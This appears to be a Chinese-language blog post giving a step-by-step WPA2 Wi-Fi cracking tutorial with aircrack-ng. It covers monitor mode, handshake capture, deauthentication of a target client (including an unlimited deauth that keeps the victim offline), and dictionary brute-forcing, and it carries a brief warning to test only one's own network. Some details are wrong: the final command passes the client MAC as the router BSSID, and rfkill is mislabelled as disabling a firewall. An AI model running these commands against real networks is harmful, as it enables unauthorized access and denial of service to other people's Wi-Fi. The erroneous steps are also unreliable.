Wi-Fi 破解 (基於WPA2協議)

如今信息安全越來越熱門,最近搞大創項目有機會接觸到了我們一直談論的Wi-Fi破解技術,於是整理了一些關於Wi-Fi破解的東西分享給大家,包括一些Wi-Fi的基本知識。希望大家只是拿自己的Wi-Fi做實驗,不要“Wi-Fi破解,從入門到入獄”噢。

首先先提出一些基本概念:
第一個概念是無線網絡的攻擊基本類型:
1.防禦完全無效:悄無聲息安全通過
2.防禦存在障礙:攻擊這種網絡通常情況下需要一個字典,通過字典攻擊拿到基於“有線等效保密協議”和“Wi-Fi保護訪問的預共享密鑰”

WEP:有線等效保密協議
WPA:Wi-Fi保護訪問
WPA-PSK:pre-shared key(Wi-Fi保護訪問下的預共享密鑰)
BSSID:路由器的mac地址

目前我們普遍使用的是WPA2協議支持的Wi-Fi安全機制。就在半個月前樣子,網絡上就曝出了WPA2協議層出現巨大漏洞,導致用戶登錄網站的用戶名和密碼可以被破解獲得,所以WPA2也不再絕對安全了。
我自己的實驗是基於Linux Ubuntu 16.04 操作系統,由於系統搭建在VMWare虛擬機上,所以需要使用外接網卡,我使用的是360無線網卡(市面上隨處可見)但是對於網卡有個硬件要求就是需要支持監聽模式(monitor)並且在多個操作系統上都能運行。如果不支持監聽模式,那麼就無法抓取到受害者的Wi-Fi數據包。

Linux下的工具有很多,在本次實驗中我使用aircrack-ng去抓取數據包並使用字典暴力破解。

第一部分:
安裝aircrack-ng與wireshark,這個很簡單,在Linux命令行下直接輸入這兩個軟件的名字,按照提示使用apt-get即可。
爲了方便,先在命令行輸入:sudo su 輸入用戶密碼獲得管理員權限,這樣後面開啓監聽模式就不會遇到權限不夠等問題。並且使用iwconfig查看是否讀取到網卡的數據,若出現外接網卡的數據說明連接成功。然後點擊右上角圖標將Wi-Fi關閉。
此處的外接360網卡名字爲wlx0087

第二部分:
不廢話直接上指令:

以下是基於Linux操作系統的aircrack-ng操作命令

1. 需要先關閉Wi-Fi,將無線網卡的模式調至monitor

iwconfig wlx0087 mode monitor

2.打開無線網卡的監聽模式

airmon-ng start wlx0087 6 

3.kill PID 殺死多餘進程

kill PID pid_num

4.關閉防火牆

rfkill unblock all

5. 使用mon0 -9 是數據包注入測試

aireplay-ng -9 mon0

假設AB:CD:EF:GH:IJ:KL爲路由器的MAC地址,MN:OP:QR:ST:UV:WX爲你要攻擊的用戶MAC地址······

6. 開始抓包,並將數據存儲到output爲名字的文件裏,一般保存在當前目錄

airodump-ng -c 6 --bssid AB:CD:EF:GH:IJ:KL -w output mon0

7. 使用戶掉線重連,用於抓取握手包

aireplay-ng -0 1 -a AB:CD:EF:GH:IJ:KL -c MN:OP:QR:ST:UV:WX mon0

小TIP:此處的命令若改成sudo aireplay-ng --deauth 1/0(0表示無限次) -a AB:CD:EF:GH:IJ:KL(指定基本服務集標識) -c MN:OP:QR:ST:UV:WX(指定目標地址) mon0

deauth後面的參數設置成0,這意味着數據包的無限注入,這樣如果黑客不停止數據包注入,你將永遠連不上自己的Wi-Fi並始終處於掉線模式,經過實驗發現我自己的蘋果手機是可以被攻擊的。

8. 使用字典開始暴力破解

aircrack-ng -w dict.txt -b MN:OP:QR:ST:UV:WX output*.cap
所謂字典dict.txt就是含有衆多密碼的記事本,這個可以去GitHub上進行搜索,也可以自己製作一本。

以上就是我進行的Wi-Fi攻擊破解實驗操作步驟,有些地方可能還不完善,希望各位大佬提出意見,我後面也會放入實驗圖片繼續完善這篇博文(小筆記)  :)
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章